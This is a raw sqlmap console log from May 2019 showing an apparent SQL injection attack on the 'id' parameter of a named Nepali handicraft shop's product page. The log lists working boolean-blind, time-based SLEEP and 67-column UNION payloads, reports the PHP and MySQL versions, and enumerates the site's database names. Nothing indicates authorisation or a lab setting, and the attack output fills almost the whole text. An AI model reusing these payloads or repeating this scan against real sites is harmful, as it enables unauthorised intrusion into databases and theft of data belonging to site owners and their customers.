http://www.nepalartcraft.com/product.php?id=221
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.3.44#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:53:25 /2019-05-25/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[11:53:26] [INFO] testing connection to the target URL
[11:53:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:53:27] [INFO] testing if the target URL content is stable
[11:53:27] [INFO] target URL content is stable
[11:53:27] [INFO] testing if GET parameter 'id' is dynamic
[11:53:27] [INFO] GET parameter 'id' appears to be dynamic
[11:53:28] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:53:28] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:53:28] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[11:53:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:53:28] [WARNING] reflective value(s) found and filtering out
[11:53:39] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Cm")
[11:53:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:53:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:53:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:53:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:53:39] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:53:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:53:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:53:40] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:53:40] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:53:40] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:53:40] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:53:41] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:53:41] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:53:41] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[11:53:41] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[11:53:41] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:53:41] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:53:41] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:53:41] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[11:53:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:53:41] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:53:41] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:53:41] [INFO] testing 'MySQL inline queries'
[11:53:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[11:53:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:53:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[11:53:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[11:53:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:53:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:53:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[11:55:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
[11:55:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:55:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:55:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:55:26] [INFO] target URL appears to have 67 columns in query
[11:56:07] [WARNING] combined UNION/error-based SQL injection case found on column 66. sqlmap will try to find another column with better characteristics
[11:56:08] [WARNING] combined UNION/error-based SQL injection case found on column 61. sqlmap will try to find another column with better characteristics
[11:56:08] [WARNING] combined UNION/error-based SQL injection case found on column 26. sqlmap will try to find another column with better characteristics
[11:56:09] [WARNING] combined UNION/error-based SQL injection case found on column 30. sqlmap will try to find another column with better characteristics
[11:56:09] [WARNING] combined UNION/error-based SQL injection case found on column 3. sqlmap will try to find another column with better characteristics
[11:56:09] [WARNING] combined UNION/error-based SQL injection case found on column 29. sqlmap will try to find another column with better characteristics
[11:56:09] [WARNING] combined UNION/error-based SQL injection case found on column 27. sqlmap will try to find another column with better characteristics
[11:56:10] [WARNING] combined UNION/error-based SQL injection case found on column 52. sqlmap will try to find another column with better characteristics
[11:56:10] [WARNING] combined UNION/error-based SQL injection case found on column 33. sqlmap will try to find another column with better characteristics
[11:56:10] [WARNING] combined UNION/error-based SQL injection case found on column 58. sqlmap will try to find another column with better characteristics
[11:56:11] [WARNING] combined UNION/error-based SQL injection case found on column 5. sqlmap will try to find another column with better characteristics
[11:56:11] [WARNING] combined UNION/error-based SQL injection case found on column 64. sqlmap will try to find another column with better characteristics
[11:56:12] [WARNING] combined UNION/error-based SQL injection case found on column 28. sqlmap will try to find another column with better characteristics
[11:56:12] [WARNING] combined UNION/error-based SQL injection case found on column 62. sqlmap will try to find another column with better characteristics
[11:56:12] [WARNING] combined UNION/error-based SQL injection case found on column 51. sqlmap will try to find another column with better characteristics
[11:56:13] [WARNING] combined UNION/error-based SQL injection case found on column 67. sqlmap will try to find another column with better characteristics
[11:56:13] [WARNING] combined UNION/error-based SQL injection case found on column 31. sqlmap will try to find another column with better characteristics
[11:56:14] [WARNING] combined UNION/error-based SQL injection case found on column 65. sqlmap will try to find another column with better characteristics
[11:56:14] [WARNING] combined UNION/error-based SQL injection case found on column 60. sqlmap will try to find another column with better characteristics
[11:56:15] [WARNING] combined UNION/error-based SQL injection case found on column 59. sqlmap will try to find another column with better characteristics
[11:56:16] [WARNING] combined UNION/error-based SQL injection case found on column 39. sqlmap will try to find another column with better characteristics
[11:56:17] [WARNING] combined UNION/error-based SQL injection case found on column 2. sqlmap will try to find another column with better characteristics
[11:56:17] [WARNING] combined UNION/error-based SQL injection case found on column 63. sqlmap will try to find another column with better characteristics
[11:56:17] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[?1049h[22;0;0t[1;24r(B[m[4l[?7h[H[2J[24;1H[?1049l[23;0;0t[?1l>GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 278 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=221' AND 4679=4679-- JAhc

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=221' AND SLEEP(5)-- gtAw

    Type: UNION query
    Title: Generic UNION query (NULL) - 67 columns
    Payload: id=-6176' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706271,0x536e41637271597a637575564c476b766e5172637261716a574c74556b784c45526f535063746a68,0x7171706a71),NULL,NULL,NULL,NULL-- YOTV
---
[11:56:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[11:56:17] [INFO] fetching database names
[11:56:18] [INFO] used SQL query returns 2 entries
[11:56:18] [INFO] retrieved: 'information_schema'
[11:56:18] [INFO] retrieved: 'nepalcrr_db'
available databases [2]:
[*] information_schema
[*] nepalcrr_db

[11:56:18] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nepalartcraft.com'

[*] ending @ 11:56:18 /2019-05-25/

